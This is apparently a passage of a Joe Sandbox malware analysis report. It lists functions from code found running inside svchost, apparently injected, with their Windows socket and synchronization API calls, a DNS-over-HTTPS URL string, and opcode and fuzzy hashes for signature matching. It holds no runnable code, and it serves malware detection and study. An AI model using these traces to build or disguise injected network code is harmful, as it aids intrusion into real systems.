                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • socket.WS2_32(00003A9A,00000001,00000000), ref: 04D7ADE5
                                                                                                                                                            • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,04D7BA4B,?,00000000,?,00000000,00000000,?,00000000), ref: 04D7AE22
                                                                                                                                                            • closesocket.WS2_32(00000000), ref: 04D7AE5D
                                                                                                                                                            • memset.MSVCRT ref: 04D7AE73
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 04D7AED4
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 04D7AEE1
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 04D7AEEB
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 04D7AEF3
                                                                                                                                                            • closesocket.WS2_32(?), ref: 04D7AF17
                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 04D7AF25
                                                                                                                                                            • RegisterWaitForSingleObject.KERNEL32(00000154,?,04D7AF9E,00000000,000000FF,00000004), ref: 04D7AF62
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$Handleclosesocket$CloseInformationObjectRegisterSingleWaitmemsetsocket
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1241441197-0
                                                                                                                                                            • Opcode ID: ebc5269bf7b0e4ec085d01787ab6f5eb797ec255f88b38e7e32cf97cd1afdf60
                                                                                                                                                            • Instruction ID: 86578d152916b825408d961fdd517e3e7ee73d0a21218fe66a9b03a5cc44359e
                                                                                                                                                            • Opcode Fuzzy Hash: ebc5269bf7b0e4ec085d01787ab6f5eb797ec255f88b38e7e32cf97cd1afdf60
                                                                                                                                                            • Instruction Fuzzy Hash: 98517F72300606FFEB159F60CC45BAAB7A8FF04351F104A2AF556C6290FB78F9119B90
                                                                                                                                                            Function 04D742EC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 166stringnetworkCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: htonsstrlen$callocinet_addrmemset
                                                                                                                                                            • String ID: https://cloudflare-dns.com/dns-query
                                                                                                                                                            • API String ID: 1536131324-770057447
                                                                                                                                                            • Opcode ID: c56ce2fc3c8ef9978e974c2d62f05f3a08e0968cbea121c4ddbdf803ea672aa1
                                                                                                                                                            • Instruction ID: 7ff99b0ebbe3248747ab3443c6ef7f8cdd6912b5e410ebab2e7bafa9e4b1e860
                                                                                                                                                            • Opcode Fuzzy Hash: c56ce2fc3c8ef9978e974c2d62f05f3a08e0968cbea121c4ddbdf803ea672aa1
                                                                                                                                                            • Instruction Fuzzy Hash: 4C513B72640705ABEB21EFA0CC45BDBB7ACFF04318F00491AE959D6241FBB4F9549BA1
                                                                                                                                                            Function 04D7A964 Relevance: 12.2, APIs: 8, Instructions: 170networkCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 04D7A9E0
                                                                                                                                                            • WSAGetLastError.WS2_32(?,00000000,?,04D79AC3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,04D79A33,00000000,00000000,?,00000000), ref: 04D7A9F1
                                                                                                                                                            • closesocket.WS2_32(?), ref: 04D7AA67
                                                                                                                                                            • UnregisterWait.KERNEL32(?), ref: 04D7AAAC
                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,04D79AC3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,04D79A33,00000000), ref: 04D7AAC6
                                                                                                                                                            • free.MSVCRT ref: 04D7AAEC
                                                                                                                                                            • UnregisterWait.KERNEL32(?), ref: 04D7AB0D
                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,04D79AC3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,04D79A33,00000000), ref: 04D7AB1F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseHandleUnregisterWait$ErrorLastclosesocketfreeshutdown
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3261266694-0
                                                                                                                                                            • Opcode ID: dcf68ddad1c2a9a6edb799eabc3f565ba8767ca14fd1dd6227f7f7f102d1db3d
                                                                                                                                                            • Instruction ID: 416533164ce1bfeab4b0ac6dfd41f57c2c3e388637ce36d228ece9818e46f6f1
                                                                                                                                                            • Opcode Fuzzy Hash: dcf68ddad1c2a9a6edb799eabc3f565ba8767ca14fd1dd6227f7f7f102d1db3d
                                                                                                                                                            • Instruction Fuzzy Hash: 86514431604B029FDB34CF69C584A6AB7F5FF44365B104A2EE9A6877A1E730F849CB50
                                                                                                                                                            Function 04D7CE0A Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4054172246-0
                                                                                                                                                            • Opcode ID: c849f6828341ce02218380e128eed7776a0d933b82320795ac257d08f540c2ec
                                                                                                                                                            • Instruction ID: e494578e899fbe3be7ef11044a304791ff0673915b4cfa4b91ffbea0d1d1a65b
                                                                                                                                                            • Opcode Fuzzy Hash: c849f6828341ce02218380e128eed7776a0d933b82320795ac257d08f540c2ec
                                                                                                                                                            • Instruction Fuzzy Hash: B4517C72610609BFE721DF65C844B9ABBF8FF04714F10896AE58BD6180E774FA05CBA0
                                                                                                                                                            Function 04D7C391 Relevance: 10.6, APIs: 7, Instructions: 83networksynchronizationCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,04D7CC99,?,000000FF,00000000,00000000), ref: 04D7C3B8
                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,04D7CC99), ref: 04D7C3F9
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,04D7CC99), ref: 04D7C404
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,04D7CC99), ref: 04D7C40D
                                                                                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,04D7CC99), ref: 04D7C414
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,04D7CC99), ref: 04D7C423
                                                                                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,04D7CC99), ref: 04D7C446
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$CloseHandle$CreateEventObjectSingleWait
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1659421480-0
                                                                                                                                                            • Opcode ID: 748072964ecd071c5d05a0341f8ea44c007c48d03ca01b1e09d0bb0700185faf
                                                                                                                                                            • Instruction ID: 54833f60249a744c3a4299febd6f5d702c37a518ab2a64e7270e796a83a63b3a
                                                                                                                                                            • Opcode Fuzzy Hash: 748072964ecd071c5d05a0341f8ea44c007c48d03ca01b1e09d0bb0700185faf
                                                                                                                                                            • Instruction Fuzzy Hash: 3121F632650110BFDB311F68DC49EAF7AA8FB84B74F140B55FE65E72C4E634AD4086A0
                                                                                                                                                            Function 04D75DC5 Relevance: 8.8, APIs: 7, Instructions: 82COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • memcmp.MSVCRT(?,04D96EC0,0000000C), ref: 04D75DFF
                                                                                                                                                            • memcmp.MSVCRT(?,04D96EB0,0000000C), ref: 04D75E21
                                                                                                                                                            • memcmp.MSVCRT(?,04D96EA0,0000000C), ref: 04D75E43
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E80,0000000C), ref: 04D75E83
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E70,0000000C), ref: 04D75EA5
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E60,0000000C), ref: 04D75EC7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memcmp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                            • Opcode ID: fa90616d26b8ba7fce8d02fa70890551662a5cadc32ee3a4498ba803a8972c1e
                                                                                                                                                            • Instruction ID: 6227f665096cdba5ef70e78c41c05d65d39ed7179adc6bd5c7845861a886400c
                                                                                                                                                            • Opcode Fuzzy Hash: fa90616d26b8ba7fce8d02fa70890551662a5cadc32ee3a4498ba803a8972c1e
                                                                                                                                                            • Instruction Fuzzy Hash: 79114C62745A12A2FF2036652E07F2F16D6AB21AACF884121FD85F5646F141FE0EC357
                                                                                                                                                            Function 04D73D1A Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 377COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memcmp$callocfree
                                                                                                                                                            • String ID: factfmt RIFFdata
                                                                                                                                                            • API String ID: 254810267-2461439165
                                                                                                                                                            • Opcode ID: fc46fe5f89301a3813b1da54e17d11af67f076e922feb8002d218f70ce38a6ef
                                                                                                                                                            • Instruction ID: 34b454f7039d72230415e4dfba110035389b6bb7821f7d2f57295fccab400d8b
                                                                                                                                                            • Opcode Fuzzy Hash: fc46fe5f89301a3813b1da54e17d11af67f076e922feb8002d218f70ce38a6ef
                                                                                                                                                            • Instruction Fuzzy Hash: CFD19172E002199BDF25DFA4C884BEEB7F9EF55314F0484AAE915E7240E734BA44CB64
                                                                                                                                                            Function 04D836FD Relevance: 7.8, APIs: 6, Instructions: 347COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memset$calloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1504270956-0
                                                                                                                                                            • Opcode ID: eab615d07e962091583c8caf59c3f29853e30492d685591d187327f033e6e27c
                                                                                                                                                            • Instruction ID: 3583d39df75322758cd918f8c750fc62259f4d549aca8853f1fa5e1d1acf4f87
                                                                                                                                                            • Opcode Fuzzy Hash: eab615d07e962091583c8caf59c3f29853e30492d685591d187327f033e6e27c
                                                                                                                                                            • Instruction Fuzzy Hash: 3EC11CB2A00609ABEB10EFA5CD85EFF77FCEB45644F14456EE949D6140F631FA048BA0
                                                                                                                                                            Function 04D7A6A3 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 158stringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: strchr$memset
                                                                                                                                                            • String ID: 0123456789ABCDEF$0123456789abcdef
                                                                                                                                                            • API String ID: 3020236661-885041942
                                                                                                                                                            • Opcode ID: 47f188f88b1ddd483e33cc23986bde3c6b54fed2f771ed6d1e948f53300f2468
                                                                                                                                                            • Instruction ID: 438767d4ee91b99ef3235834a853d43564dd459b4061006d7bba7f9618057dd3
                                                                                                                                                            • Opcode Fuzzy Hash: 47f188f88b1ddd483e33cc23986bde3c6b54fed2f771ed6d1e948f53300f2468
                                                                                                                                                            • Instruction Fuzzy Hash: B5519F31A0424AAFDF15CF98C8909EEBBB5FB81355F2045AED441EB740E730AE85CB90
                                                                                                                                                            Function 04D79C8E Relevance: 7.5, APIs: 5, Instructions: 33synchronizationCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,04D79C8B,00000000,04D7CC8C,04D7CCD3,04D97D20,04D7CCDB,04D7CC8C,00000000), ref: 04D79C9B
                                                                                                                                                            • InterlockedCompareExchange.KERNEL32(04D7CC90,00000000,00000000), ref: 04D79CAD
                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,04D79C8B,00000000,04D7CC8C,04D7CCD3,04D97D20,04D7CCDB,04D7CC8C,00000000), ref: 04D79CBE
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,04D79C8B,00000000,04D7CC8C,04D7CCD3,04D97D20,04D7CCDB,04D7CC8C,00000000), ref: 04D79CCA
                                                                                                                                                            • WaitForSingleObject.KERNEL32(04D7CC8C,000000FF,?,04D79C8B,00000000,04D7CC8C,04D7CCD3,04D97D20,04D7CCDB,04D7CC8C,00000000), ref: 04D79CD5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Event$CloseCompareCreateExchangeHandleInterlockedObjectSingleWait
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4206309166-0
                                                                                                                                                            • Opcode ID: e0267fa8bb6708999210603a298129a8c46870dc8bc0f5af2bbf24c3e7151edd
                                                                                                                                                            • Instruction ID: a6e5bd9228d2f748e51237eb44eca8400852ff3f8cb4b1ba51ba23443f026d2b
                                                                                                                                                            • Opcode Fuzzy Hash: e0267fa8bb6708999210603a298129a8c46870dc8bc0f5af2bbf24c3e7151edd
                                                                                                                                                            • Instruction Fuzzy Hash: 08F01271345304BBEB202FA4DC59F9A7FACEB047A1F104991FA5ED52C0EA75AD40CB60
                                                                                                                                                            Function 04D75F37 Relevance: 6.3, APIs: 5, Instructions: 62COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E30,0000000E), ref: 04D75F62
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E20,0000000E), ref: 04D75F84
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E10,0000000E), ref: 04D75FA6
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E00,0000000E), ref: 04D75FC8
                                                                                                                                                            • memcmp.MSVCRT(?,04D96DF0,0000000E), ref: 04D75FEA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memcmp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                            • Opcode ID: 22df16191cce2c2ededf133c25ff590702faba081051de44424c0d0aa4cb948f
                                                                                                                                                            • Instruction ID: 0da4f615d7f9d851d9274335e29e9b7ca99e5b5431a7273c00850c0db437c12a
                                                                                                                                                            • Opcode Fuzzy Hash: 22df16191cce2c2ededf133c25ff590702faba081051de44424c0d0aa4cb948f
                                                                                                                                                            • Instruction Fuzzy Hash: 1E012CA1754B0662FF242A745E03F2E11D6A7106ACFCC4565FD44F9285F482FE5E8352
                                                                                                                                                            Function 04D76004 Relevance: 6.3, APIs: 5, Instructions: 58COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • memcmp.MSVCRT(?,04D96DE0,0000000F), ref: 04D76025
                                                                                                                                                            • memcmp.MSVCRT(?,04D96DD0,0000000F), ref: 04D76043
                                                                                                                                                            • memcmp.MSVCRT(?,04D96DC0,0000000F), ref: 04D76065
                                                                                                                                                            • memcmp.MSVCRT(?,04D96DB0,0000000F), ref: 04D76087
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memcmp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                            • Opcode ID: e10fff8af88892eb4727a1836f9bcef896efe1bd9b1f59fe99f2e7af16aa4f25
                                                                                                                                                            • Instruction ID: 068ec8c4112de933330a03b5ffdd5f2b62b964153867f0cf113ebc889f62a98c
                                                                                                                                                            • Opcode Fuzzy Hash: e10fff8af88892eb4727a1836f9bcef896efe1bd9b1f59fe99f2e7af16aa4f25
                                                                                                                                                            • Instruction Fuzzy Hash: F2014B62784E1262FF2039640D03B6E21D5AB116FCF8C0071FD54F564AF145FE0E92A6
                                                                                                                                                            Function 04D741F6 Relevance: 6.1, APIs: 4, Instructions: 88networkCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • memset.MSVCRT ref: 04D74236
                                                                                                                                                            • getaddrinfo.WS2_32(?,00000000,?,00000000), ref: 04D74259
                                                                                                                                                            • htons.WS2_32(00000006), ref: 04D742BE
                                                                                                                                                            • FreeAddrInfoW.WS2_32(00000000), ref: 04D742D5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddrFreeInfogetaddrinfohtonsmemset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 928751204-0
                                                                                                                                                            • Opcode ID: b40a7b3441a13de246f82cfc11a81f966c66aceeff76d23986e73fce5b2a64bd
                                                                                                                                                            • Instruction ID: a4dbc6103d64cda48b224e5e61a19ec5d2168febb4e566f8f782300fe0bc31c0
                                                                                                                                                            • Opcode Fuzzy Hash: b40a7b3441a13de246f82cfc11a81f966c66aceeff76d23986e73fce5b2a64bd
                                                                                                                                                            • Instruction Fuzzy Hash: C331BA35A00209AFDF25DF94C888ADEBBB9FF48314F148559E605D7211E370EDA4CBA0
                                                                                                                                                            Function 04D7B62C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248networkCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • WSARecv.WS2_32(?,?,00000001,00000000,?,00000000,00000000), ref: 04D7B732
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 04D7B7E3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastRecv
                                                                                                                                                            • String ID: E'
                                                                                                                                                            • API String ID: 904507345-3751625834
                                                                                                                                                            • Opcode ID: fbea2923f2aa126f8b819a87fb989b304bc57ef50ca55010b04bfc6c85ef0369
                                                                                                                                                            • Instruction ID: 92695f2ecb8acb519450b2411ea5ca26d2e77e2e3c2c57683ecbec9cf08bf528
                                                                                                                                                            • Opcode Fuzzy Hash: fbea2923f2aa126f8b819a87fb989b304bc57ef50ca55010b04bfc6c85ef0369
                                                                                                                                                            • Instruction Fuzzy Hash: 55818371500708AFEB349F55C885AAA77F8FF0436CF044A1FE99686690F735F9858B90
                                                                                                                                                            Function 04D7F06E Relevance: 5.1, APIs: 4, Instructions: 54stringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: strlen$callocfree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3898528724-0
                                                                                                                                                            • Opcode ID: 49a7b89c939da9cc68ebabb4e09e42fec64b23cafba51b3217e05e127845cb9a
                                                                                                                                                            • Instruction ID: c5cfcd73e8107a8f1298afcaf64632756903356dffcf9ea4e59ad9ba79b575c0
                                                                                                                                                            • Opcode Fuzzy Hash: 49a7b89c939da9cc68ebabb4e09e42fec64b23cafba51b3217e05e127845cb9a
                                                                                                                                                            • Instruction Fuzzy Hash: D5012DB1708702AEEB30AB759C90B6777DAEB44255F00082EF659C2241FB31E9009662